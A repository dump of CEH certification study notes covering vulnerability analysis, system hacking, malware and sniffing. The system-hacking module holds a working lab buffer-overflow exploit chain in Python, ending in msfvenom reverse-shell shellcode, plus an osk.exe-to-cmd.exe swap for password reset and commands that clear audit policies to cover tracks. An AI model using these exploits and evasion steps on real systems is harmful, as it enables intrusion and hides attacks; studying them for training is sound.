├── .gitattributes ├── Module 05 - Vulnerability Analysis └── CEH Module 5 - Vulnerability Analysis.md ├── Module 06 - System Hacking ├── CEH Module 6 - System Hacking.md └── buffer │ ├── Buffer Instructions.md │ ├── badchars.py │ ├── fuzzing.py │ ├── offset.py │ ├── shellcode.py │ └── verify DLL address.py ├── Module 07 - Malware Threats ├── CEH Module 7 - Malware Threats.md └── Virus Programming.pdf ├── Module 08 - Sniffing └── CEH Module 8 - Sniffing.md ├── Module 09 - Social Engineering └── 09_Social_Engineering.md ├── Module 1 :-: Introduction.md ├── Module 10 - DOS and DDOS └── 10_Denial_of_Services.md ├── Module 11 - Session Hijacking └── Session Hijacking.md ├── Module 12 - Evading IDS, Firewall and HoneyPots └── Module 12 - IDS, FIREWALL AND HONEYPOTS.pdf ├── Module 13 - Hacking web Servers └── 13_Hacking_Web_Servers.md ├── Module 14 - Web Application └── 14_Hacking_Web_Applications.md ├── Module 15 - SQL Injection └── 15_SQL_Injection.md ├── Module 16 - Wireless Networks ├── 16_Hacking_Wireless_Networks.md └── Infographic_20_years_of_Wi-Fi_0.pdf ├── Module 17 - Mobile Platform └── 17_Hacking_Mobile_Platforms.md ├── Module 18 - IOT Hacking └── 18_IoT_Hacking.md ├── Module 19 - Cloud Computing └── 19_Cloud_Computing.md ├── Module 2 :-: FootPrinting.md ├── Module 20 - Cryptography └── 20_Cryptography.md ├── Module 3 :-: Network Scanning.md ├── README.md └── _config.yml /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /Module 05 - Vulnerability Analysis/CEH Module 5 - Vulnerability Analysis.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Assessment/Research 2 | Vulnerability Assessment is a process of examination, discovery, and identification of a system and applications security measures and weakness. It helps to recognize the vulnerabilities that could be exploited, need of additional security layers, and information that can be revealed using scanners. 3 | -------------------------------- 4 | # Vulnerability Assessment Life-Cycle 5 | - Discover: Discover Vulnerability 6 | - Priotize : Priotize Vulnerability as per its target, impact, loss value, Bussiness Impact, etc. 7 | - Report : Prepare a report on Vulnerability. 8 | - Remediate : Take appropriate perventive actions. 9 | - Verify : Verfiy that vulnerability is resolved or not. 10 | - Monitor : Monitor the network traffic and system behaviors for any further intrusion. 11 | -------------------------------------------------------------------------------------------------- 12 | # Vulnerability Scoring System - CVSS (Critical Vulnerability Scoring System) -> CVE-CWE 13 | - Common Vulnerability Scoring System (CVSS v2.0) 14 | - Low: 0.0 - 3.9 15 | - Medium: 4.0 - 6.9 16 | - High: 7.0 - 10.0 17 | 18 | - Common Vulnerability Scoring System (CVSS v3.0) 19 | - None: 0.0 - INFO 20 | - Low: 0.1 - 3.9 21 | - Medium: 4.0 - 6.9 22 | - High: 7.0 - 8.9 23 | - Critical: 9.0 - 10.0 24 | -------------------------------------------------------------------------------------------------- 25 | # Common Vulnerabilities and Exposures (CVE) - Whenever a Vulnerability is exposed globally it is distinguished by it CVE number. 26 | - Platforms to find information about vulnerabilities 27 | - https://nvd.nist.gov/ 28 | - https://cve.mitre.org/ 29 | - https://exploit-db.com/ 30 | -------------------------------------------------------------------------------------------------- 31 | # Vulnerability Scanners 32 | Vulnerability Scanners are automated utilities to detect vulnerabilities. They are capable of :- 33 | - OS Detection and Version Detection 34 | - Applications Installed 35 | - Accounts with Weak Passwords 36 | - Missing Patches 37 | - Weak/Misconfigured Network and Risky Ports 38 | These scanning tools perform deep inspection of scripts, open ports, banners, running services, configuration errors, etc... 39 | 40 | # Top scanners: 41 | - Nmap Scripts - Vuln, discovery, safe, etc 42 | - Nikto 43 | - wpscan 44 | - Acunetix 45 | - Nessus 46 | - Qualys Free Scan 47 | - Crashtest - https://crashtest.cloud/login 48 | -------------------------------------------------------------------------------------------------- 49 | -------------------------------------------------------------------------------- /Module 06 - System Hacking/CEH Module 6 - System Hacking.md: -------------------------------------------------------------------------------- 1 | # Methods for System Hacking 2 | 3 | - Cracking Password 4 | - Exploit Services, Application Installed, OS 5 | - Malicious Applications 6 | 7 | ------------------------------------------------------------------------------------------------- 8 | 9 | # Password Cracking - Password Cracking is the method for extracting the password to gain authorized access to the target system like a legitimate user 10 | 11 | Three type of authentication factors: 12 | 13 | - Authentication using Username and password 14 | - Authentication using Biometric (Fingerprint, Retina Scan) 15 | - Only Authorized Devices are allowed to connect. This can be done by filtering MAC Address 16 | 17 | ------------------------------------------------ 18 | 19 | # Characteristics of Secure password 20 | 21 | - In Case sensitive letters 22 | - Special characters 23 | - Numbers 24 | - Lengthy password/Pin (more than 8 character) 25 | - Pass-Phrases 26 | 27 | ------------------------------------------------ 28 | 29 | # Types of Password Attacks 30 | 31 | # Non-Electronic Attacks - Don't require any type of technical understanding and knowledge. 32 | Example: 33 | - Shoulder-Surfing 34 | - Dumpster-Diving 35 | - Eaves-Dropping 36 | - Vishing ---> 37 | 38 | # Active Online Attack - Directly interact with the target for cracking password 39 | 40 | - Dictionary/Wordlist Attack - In Dictionary Attack, Attacker Use Preconfigured wordlist (For Username or Password) to gain access into victims account. 41 | - Brute Force Attack - In Brute Force Attack, Attacker Try every possible combination of Characters to gain access to victims account. 42 | - Hash Injection - Hash Injection is performed after gaining access to System. In Hash Injection, Attacker try to crack Hashes available in SAM (Security Account Manager) 43 | Location : C:\windows\system32\config\SAM) in Windows and Shadow file in Linux OS. ---> /etc/shadows ---> 44 | 45 | # Passive Online Attacks - Passive online attacks are performed without interfering with the target 46 | 47 | - Wire Sniffing - In Wire Sniffing, Attacker Sniff network Traffic and try to extract sensitive Information like Telnet, FTP, SMTP credentials. 48 | - Man-in-the-Middle (MITM) Attack - The attacker involves himself into the communication, insert himself in. 49 | MITM Attacks: 50 | - xerosploit --> Ettercap --> Bettercap 51 | - Browser Exploitation Framework (BeEF-XSS) - older version on browser ---> XSS Protection 52 | 53 | # Default Password - Default Password are Set by Developer or Manufacturer. Attacker Try those password to gain Access 54 | 55 | - 56 | - 57 | - 58 | 59 | # Password Guessing - The attacker uses the information extracted by initial phases and guess the password 60 | 61 | # USB Drive - Attacker plug in an USB Drive that contain a password hacking tool. Windows Autorun feature allows running the application automatically, if enabled 62 | 63 | # Password Cracking Techniques for Windows Devices 64 | - Create a windows/linux Bootalbe pendrive. 65 | - Access CMD with Shift+F10 in Windows Bootable or Access Terminal in Linux 66 | - For Windows type below commands:-: 67 | --> diskpart // Access Disk Partition menu 68 | --> list volume // List Partitions and Partition letter for Connected Storage Drives 69 | --> exit // Exit Diskpart. Not CMD 70 | --> C: // Access Local Drive C: 71 | --> dir // List all files and folder in "local drive C:" if Windows,Program Files Folder are there in Local drive C: its good otherwise try local drive D: or E: or F: ................. 72 | --> cd Windows // Browse for Windows Folder 73 | --> cd System32 // Browse for System32 Folder 74 | --> ren osk.exe osk1.exe // Rename osk.exe to osk1.exe 75 | --> copy cmd.exe to osk.exe // Create a copy of CMD.EXE with a name OSK.EXE 76 | ///// Exit ///// Reboot ///// Access On Screen Keyboard through Accessibility Shortcuts 77 | --> net user // Display Users Available on System 78 | --> net user Babu_Bhai * // Change Password for user "Babu_Bhai". Here astric (*) is used to change password 79 | --> net user Abcd /add // Create a user with the naem Abcd 80 | 81 | # Password Cracking Mitigation 82 | - Change default password. 83 | - Do not store/save passwords in applications. 84 | - Do not use guessable passwords. 85 | - Store passwords in form of salted hash. 86 | - Change passwords on weekly/Monthly basis. 87 | - Different password for each service. 88 | - Configure policies for incorrect password attempts. ---> 89 | 90 | ------------------------------------------------------------------------------------------------- 91 | 92 | # Escalating Privileges - Privilege Escalation is the process of gaining Privileges of Other user. --> 93 | 94 | - Horizontal Privileges Escalation - The attacker attempts to gain access to user with same set of privileges. 95 | 96 | - Vertical Privileges Escalation - The attacker try to gain access to user with higher set of Privileges. 97 | 98 | ------------------------------------------------------------------------------------------------- 99 | 100 | # Keyloggers 101 | 102 | - Keylogger are malicious software that capture your keystrokes. 103 | 104 | # Anti-Keyloggers 105 | 106 | - Anti-Keylogger is an application which ensures protection against keylogging by providing SSl protection, keylogging protection, clipboard logging protection and screen logging protection. 107 | 108 | # Key-logging Countermeasures 109 | 110 | - Don't click on doubtful URLs 111 | - On-Screen keyboard for secrets 112 | - Physical monitoring 113 | - Host-based IDS 114 | - File scanning prior to installation 115 | 116 | # Adware - Adware is a malicious software that show Advertisements to victim by inspecting his actions and interests 117 | 118 | # Spyware - Spyware are malicious software that capture your keystrokes, screen, camera, Mic, Location, etc 119 | 120 | Features: 121 | 122 | - Tracking users (i.e. keylogging) 123 | - Voice recording 124 | - Video recording 125 | 126 | ------------------------------------------------------------------------------------------------- 127 | 128 | # File Systems 129 | 130 | - New Technology File System (NTFS) Data Stream, is a Windows file system by Microsoft. NTFS is the default file system for Windows 10,- 7,- Vista,- XP,- 2000,- NT. 131 | 132 | - File Allocation Table (FAT) file system, is a simple file system originally designed for small disks and simple folder structures. 133 | 134 | - Extended File System (Ext) file System, is the first file system created specifically for the Linux kernel 135 | 136 | ------------------------------------------------------------------------------------------------- 137 | 138 | # Steganography - Steganography is a technique for hiding sensitive information in an ordinary message to ensure confidentiality. Steganography uses encryption to maintain the confidentiality. It hides the encrypted data to avoid detection. An attacker may use this to technique to transfer data without being detected 139 | Examples of Steganography: 140 | - Image/Pixel Steganography - In Image Steganography, hidden information can be kept in different formats of Image such as PNG, JPG, BMP, etc. 141 | - Video Steganography - Hiding information in Video files or format. 142 | - Audio Steganography - Hiding information in Audio files or format. 143 | 144 | ------------------------------------------------------------------------------------------------- 145 | 146 | # Covering tracks - After gaining access, escalating privileges, executing applications, the next step is to wipe digital footprint that perdict attacker identity. In this phase, attacker removes all the event logs, error messages and other evidence to prevent its attack from being discovered easily 147 | 148 | Common techniques: 149 | 150 | - Disable auditing 151 | Preventing another security mechanism to indicate an alert of any sort of intrusion, and leaving to track leaving to track on the machine. The best practice for leaving no track and prevent detection is by disabling the auditing as you logged in on the system. It will not only prevent to log events, but also resist in the detection. Auditing in a system is enabled to detect and track events. 152 | - Clearing logs - By clearing logs, all events logged during the compromise will be erased. 153 | 154 | # Disable auditing policies :- 155 | 156 | - List auditing categories in windows: 157 | **-> C:\Windows\system32>auditpol /list /category "** 158 | 159 | - Check all category audit policies: 160 | **-> C:\Windows\system32>auditpol /get /category:* "** 161 | 162 | - Command to enable auditing for System and Account logon: - 163 | **-> C:\Windows\system32>auditpol /set /category:"System","Account logon" /success:enable /failure:enable "** 164 | 165 | - Command to enable auditing for all categories: 166 | **-> C:\Windwos\system32>auditpol /set /category:* /success:enable "** 167 | 168 | - Clear Audit Policies 169 | **-> C:\Windows\system32>auditpol /clear /y "** 170 | 171 | # Clearing logs - 172 | Folder of log files: 173 | Windows 2000/Server2003/Windows XP: %SystemRoot%\System32\Config 174 | Server 2008/Vista and up: %SystemRoot%\system32\winevt\logs 175 | Linux, OpenBSD: /var/log/ 176 | -------------------------------------------------------------------------------- /Module 06 - System Hacking/buffer/Buffer Instructions.md: -------------------------------------------------------------------------------- 1 | # Connect application to debugger 2 | # use spiking script with Command 3 | - generic_send_tcp 4 | - generic_send_tcp 1.1.1.14 9999 spiking.spk 0 0 5 | # Use Fuzzing Script to identify Offset 6 | - msf-pattern-create -l 7 | - msf-pattern-offste -l -q 8 | # Find Bad Characters 9 | **\x00 is a well known bad character so its not listed here.** 10 | \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14 \x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28 \x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c \x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50 \x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64 \x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78 \x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c \x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0 \xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4 \xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8 \xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc \xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0 \xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff 11 | 12 | # Identify Insecure DLL with Mona Master 13 | - !mona modules 14 | - !mona find -s "\xff\xe4" -m 15 | - convert Address into Big endian (Because x86 archtecture use address into little endian) 16 | # create shell 17 | - msfvenom -p windows/meterpreter_reverse_tcp lhost= lport= -f c -a x86 -b 18 | -------------------------------------------------------------------------------- /Module 06 - System Hacking/buffer/badchars.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | 4 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 5 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 6 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 7 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 8 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 9 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 10 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 11 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 12 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 13 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 14 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 15 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 16 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 17 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 18 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 19 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 20 | 21 | # Junk = ESP+EBP + EIP + badchars 22 | junk = "A"*1052 + "B"*4 + badchars 23 | # Establish Connection and Send Junk 24 | try: 25 | conn = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 26 | conn.connect(("127.0.0.1",8888)) 27 | conn.send(junk) 28 | conn.close() 29 | sys.exit() 30 | except Exception as error: 31 | print("Error Occur " + error) 32 | -------------------------------------------------------------------------------- /Module 06 - System Hacking/buffer/fuzzing.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | from time import sleep 4 | 5 | junk = "A" * 1000 6 | 7 | # Establish Connection and Send Junk 8 | while True: 9 | try: 10 | conn = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 11 | conn.connect(("127.0.0.1",8888)) 12 | conn.send(junk) 13 | conn.close() 14 | sleep(1) 15 | print("Junk Size is : "+str(len(junk))) 16 | junk = junk + "A" * 50 17 | except Exception as error: 18 | print("Error Occur " + error) 19 | sys.exit() -------------------------------------------------------------------------------- /Module 06 - System Hacking/buffer/offset.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | 4 | junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | 6 | # Establish Connection and Send Junk 7 | try: 8 | conn = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | conn.connect(("127.0.0.1",8888)) 10 | conn.send(junk) 11 | conn.close() 12 | sys.exit() 13 | except Exception as error: 14 | print("Error Occur " + error) 15 | 16 | ## EIP Address = 316A4230 17 | ## Offset = 1052 -------------------------------------------------------------------------------- /Module 06 - System Hacking/buffer/shellcode.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | target="127.0.0.1" 4 | 5 | junk="A"*1052 6 | 7 | eip="\x7B\x8A\xA9\x68" #68a98a7b : JMP ESP - Qt5Core.dll 8 | 9 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c 10 | 11 | shellcode=("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 12 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 13 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 14 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 15 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 16 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 17 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 18 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 19 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 20 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 21 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 22 | "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" 23 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x02\x01\x68" 24 | "\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" 25 | "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2" 26 | "\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" 27 | "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44" 28 | "\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56" 29 | "\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff" 30 | "\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6" 31 | "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 33 | 34 | payload=junk+eip+shellcode 35 | 36 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | s.connect((target,8888)) 38 | s.send(payload) -------------------------------------------------------------------------------- /Module 06 - System Hacking/buffer/verify DLL address.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | 4 | junk = "A" * 1052 + "\x7b\x8a\xa9\x68" 5 | 6 | # Establish Connection and Send Junk 7 | try: 8 | conn = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | conn.connect(("127.0.0.1",8888)) 10 | conn.send(junk) 11 | conn.close() 12 | sys.exit() 13 | except Exception as error: 14 | print("Error Occur " + error) 15 | 16 | ## DLL Pointer Address = 68a98a7b ( Little Endian ) 17 | ## DLL Pointer Address in Big Endian = \x7b\x8a\xa9\x68 -------------------------------------------------------------------------------- /Module 07 - Malware Threats/CEH Module 7 - Malware Threats.md: -------------------------------------------------------------------------------- 1 | # Basic 2 | Malware = **Mal**icious Soft**ware** - Malwares are Malicious software designed to harm systems or get sensitive information. 3 | Malware defines a wide variety of potentially harmful software. 4 | 5 | # Malware propagation ways 6 | - Free software (crack files, ...) 7 | - File sharing services: during the transfer, the file can be infected (torrent, ...) 8 | - Removable media (firmware embedded malware, ...) 9 | - Email (attachment, ...) 10 | - Not using firewall or anti-virus --> 11 | -------------------------------------------------------------------------------------------------- 12 | # Trojan ---> 13 | Misleads from its true intention and wait for the best time to attack. Typically spread by social engineering. 14 | Most common use: 15 | - Create back door 16 | - Gaining unauthorized access 17 | - Steal information 18 | - Infect connected devices 19 | - Ransomware attacks 20 | - Using victim as botnet 21 | - Download other malicious software 22 | - Disable security 23 | 24 | # Types of Trojans 25 | # Command Shell Trojans --> 26 | - Command Shell Trojans provide a remote control of command shell. 27 | # Botnet Trojans 28 | - Botnet is a large scale of compromised system, they spread over the world 29 | - Botnets controlled by Command and Control Centre 30 | - Used to launch distributed attacks, like DDoS, spamming 31 | # Proxy Server Trojans 32 | - Proxy Server Trojans turns the compromised system into a proxy server 33 | - Attacker use this to hide the actual source of the attack 34 | # Remote Access Trojans (RAT) 35 | - RAT allows the attacker to get remote desktop access to the victim's computer 36 | - RAT includes a back door to maintain the access and control over the victim 37 | - Attacker can monitor user, access information, alter files, etc... 38 | 39 | # Trojan Countermeasures 40 | - Avoid to click on suspected email attachments 41 | - Monitor network traffic 42 | - Avoid download from entrusted sources 43 | - Install and update security software and anti-viruses 44 | - Scan removable media before use 45 | - File integrity 46 | - Configure host-based firewall 47 | - Intrusion detection software - IDS-IPS 48 | 49 | # Detection Techniques for Trojans 50 | - Scan for suspicious network activities 51 | - Scan for suspicious ports 52 | - Scan for suspicious files and folders 53 | - Scan for suspicious processes 54 | -------------------------------------------------------------------------------------------------- 55 | # Virus and Worms 56 | # Viruses --> 57 | The virus is a self-replicating program, it is capable of producing multiple copies by attaching with another program. 58 | Characteristics of viruses: 59 | - Infecting other files 60 | - Alteration of data 61 | - Corruption 62 | - Encryption 63 | - Self-replication 64 | 65 | # Stages of Virus/worms Life 66 | - Design: develop virus from scratch or using construction kits 67 | - Replication: after the virus is deployed, it will replicate itself 68 | - Launch: user accidentally launch the infected program 69 | - Detection: the behaviour of a virus is observed, the virus is identified 70 | - Incorporation: developers design a defensive code 71 | - Elimination: update the anti-virus, virus eliminated 72 | -------------------------------------------------------------------------------------------------- 73 | # Ransomware Attack 74 | Ransomware is a malware program which restricts the access to the system files and folders by encrypting them. Some type of ransomware may lock the system as well. Attacker demands ransom to provide the decryption key. Ransomware is deployed using Trojans. Example: **WannaCry** 75 | -------------------------------------------------------------------------------------------------- 76 | # Worms 77 | Worms can replicate themselves but cannot attach themselves. It has the capability to travel without human action. The worm can propagate using file transport and spread across the infected network which virus is not capable of. 78 | 79 | # Analysis and Detection Methods 80 | - Scanning: the suspected file is scanned for the signature string 81 | - Check: the entire disk is checked for integrity, integrity checker records integrity of all files by calculating checksum usually 82 | -------------------------------------------------------------------------------------------------- 83 | # Good Reads 84 | - Stuxnet --> https://malicious.life/episode/episode-7-stuxnet-part-1/ 85 | - Baka Antivirus software --> Malware 86 | - SunBurst --> Virus used in Solarwind Attack 87 | -------------------------------------------------------------------------------- /Module 07 - Malware Threats/Virus Programming.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SNGWN/CEH-Notes/b456452938ea58dfaa7cbbfa1cbd33e641374b37/Module 07 - Malware Threats/Virus Programming.pdf -------------------------------------------------------------------------------- /Module 08 - Sniffing/CEH Module 8 - Sniffing.md: -------------------------------------------------------------------------------- 1 | # Basic 2 | With sniffing, you can monitor all sorts of traffic either protected or unprotected. 3 | Sniffing is the process of scanning and monitoring captured data like DNS traffic, web traffic and many more by enabling the promiscuous mode on the network interface. 4 | The attacker can reveal information from it such as usernames and passwords. 5 | Anyone within the same LAN can sniff the packets. 6 | 7 | # Working of Sniffers 8 | In the process of sniffing, the attacker gets connected to the target network to start sniffing. 9 | Sniffers turns Network Interface Card (NIC) into promiscuous mode. 10 | Promiscuous mode is a mode of the interface in which NIC respond for every packet it receives. 11 | The attacker decrypt the packets to extract information. 12 | 13 | # Switch vs Hub 14 | - **Switch** forward broadcast and multicast to all ports, but forward unicast packets to a specific port. 15 | - **Hub** transmits all packets to all ports. 16 | 17 | # Switch Port Analyzer (SPAN) Port 18 | In other name: **Port Mirroring**. It is used on a network switch to send a copy of network packets seen on one switch port (or an entire VLAN) to a network monitoring connection on an other switch port. 19 | -------------------------------------------------------------------------------------------------------------- 20 | # Wiretapping 21 | Gaining information by tapping the signal from wire such as telephone lines or the internet. Wiretapping mostly performed by a third party. Legal Wiretapping is called **legal interception** which is mostly performed by governments or security agencies. 22 | 23 | **Active Wiretapping** 24 | Monitoring and recording the information with alteration of the communication. 25 | 26 | **Passive Wiretapping** 27 | Monitoring and recording the information without any alteration in the communication. 28 | 29 | **Lawful Interception/Wiretapping** 30 | Wiretapping with legal authorization which allows law enforcement agencies to wiretap the communication of user. 31 | -------------------------------------------------------------------------------------------------------------- 32 | # MAC Attacks 33 | **Media Access Control** (MAC) is the physical address of a device. MAC address is a 48-bit unique identification number that is assigned to a network device for communication at data-link layer (layer 2). First 24 bits are the Object Unique Identifier (OUI), the last 24 bits are the Network Interface Controller (NIC). 34 | 35 | # MAC Flooding 36 | Attacker sends random MAC addresses mapped with random IP to overflow the storage capacity of **CAM (Content Address Memory)** table. CAM table has a fixed length, so when filled, switch act as a hub, broadcast every packet on every port, help attacker to sniff packets. Tool - **macof** 37 | 38 | # Defending against MAC Attacks 39 | Port Security is used to bind MAC address of known devices to the physical ports and violation action is also defined. 40 | -------------------------------------------------------------------------------------------------------------- 41 | # DHCP Attacks 42 | # Dynamic Host Configuration Protocol (DHCP) - DHCP is the process of allocating the IP address dynamically so these addresses are assigned automatically and they can be reused when hosts don't need them. **Round Trip Time** is the measurement of time from discovery of DHCP server until obtaining the leased IP address. 43 | 44 | # IPv4 DHCP process 45 | 1. By using UDP broadcast, DHCP client sends an initial **DHCP-Discovery** packet. 46 | 2. The DHCP server reply with a **DHCP-Offer** packet, offering the configuration parameters. 47 | 3. The DHCP client send back a **DHCP-Request** packet destined for DHCP server for requesting the DHCP 